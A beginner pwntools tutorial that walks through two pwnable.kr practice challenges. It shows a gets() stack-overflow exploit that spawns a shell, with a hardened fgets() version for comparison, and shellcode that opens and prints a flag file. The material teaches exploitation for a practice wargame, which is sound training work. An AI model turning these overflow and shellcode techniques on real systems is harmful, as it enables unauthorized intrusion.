`pwntools` Beginner Tutorial

Learning resources:

Hello World

C program source (./1.c):

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me! (unbounded read: anything past 32 bytes runs into the saved frame and key)
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);    // key starts out as 0xdeadbeef; only the overflow can change it
    return 0;
}
```

Exploit script (./1.py):

```python
from pwn import *

c = remote("pwnable.kr", 9000)
# 52 filler bytes reach from the start of overflowme[32] to the stack slot
# holding key; p32() packs the expected value little-endian. Bytes, not str,
# so the concatenation works under Python 3.
c.sendline(b"AAAA" * 13 + p32(0xcafebabe))
c.interactive()
```
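For comparison, a hardened form of `func()` from 1.c, added here as an example (not the challenge's own code, which is deliberately vulnerable): the unbounded `gets()` is replaced by a length-bounded `fgets()`, so the 52-byte payload above is truncated instead of reaching `key`. The `run_on_input()` helper and the `truncated` flag are additions for testing.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge code: func() from 1.c with gets() replaced
 * by fgets() bounded to sizeof(overflowme). A line longer than the buffer is
 * truncated instead of overwriting the stack slot that holds `key`. Input is
 * a caller-supplied FILE* so it can come from stdin or a file. Returns 1 when
 * the key check passes, 0 otherwise; *truncated is set when over-long input
 * had to be discarded, which is the event worth logging. */
int func_hardened(FILE *in, int key, int *truncated)
{
    char overflowme[32];

    *truncated = 0;
    if (fgets(overflowme, sizeof overflowme, in) == NULL)
        return 0;
    /* fgets stores at most sizeof-1 bytes; if no newline was stored, the rest
     * of the line is still in the stream and must be drained so it is not
     * mistaken for the next input */
    if (strchr(overflowme, '\n') == NULL) {
        int ch = fgetc(in);
        /* only a real overflow attempt if more than the newline was left over */
        *truncated = (ch != EOF && ch != '\n');
        while (ch != EOF && ch != '\n')
            ch = fgetc(in);
    }
    /* same comparison as 1.c; key is no longer reachable from the input */
    return (unsigned int)key == 0xcafebabeu;
}

/* Test helper: run func_hardened over a constructed string via a temporary
 * file, so it can be exercised without a live process. Returns the key-check
 * result, or -1 if no temporary file could be created. */
int run_on_input(const char *input, int key, int *truncated)
{
    FILE *in = tmpfile();
    int r;

    if (in == NULL)
        return -1;
    fputs(input, in);
    rewind(in);
    r = func_hardened(in, key, truncated);
    fclose(in);
    return r;
}
```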

ShellCode

To get the source and the executable you first need to connect to the target host over ssh:

```bash
ssh -p2222 asm@pwnable.kr
# enter the password: guest
```

Or download the files directly with scp:

```bash
scp -P 2222 asm@pwnable.kr:~/asm ./
# enter the password: guest

scp -P 2222 asm@pwnable.kr:~/asm.c ./
# enter the password: guest
```

Contents of exp.py:

```python
from pwn import *

context(arch='amd64', os='linux')
context.log_level = 'DEBUG'

p = process("./asm")
gdb.attach(p)   # opens gdb in a new terminal window; set context.terminal if it cannot find one

# the flag file name is deliberately very long, so the shellcode pushes it onto
# the stack and then performs open(2) / read(2) / write(2) itself
shellcode = shellcraft.amd64.pushstr("this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong")
shellcode += shellcraft.amd64.linux.open('rsp', 0, 0)        # rsp points at the name; rax receives the fd
shellcode += shellcraft.amd64.linux.read('rax', 'rsp', 100)  # read up to 100 bytes over the name (a count of 0 would read nothing)
shellcode += shellcraft.amd64.linux.write(1, 'rsp', 100)     # write those bytes to stdout

p.recvuntil(b'shellcode: ')
p.send(asm(shellcode))
log.success(p.recvall())
```

Besides I/O, the object returned by process can be attached to gdb with gdb.attach(p). Once attached, gdb can debug the program as usual (set breakpoints, inspect the stack, and do simple disassembly).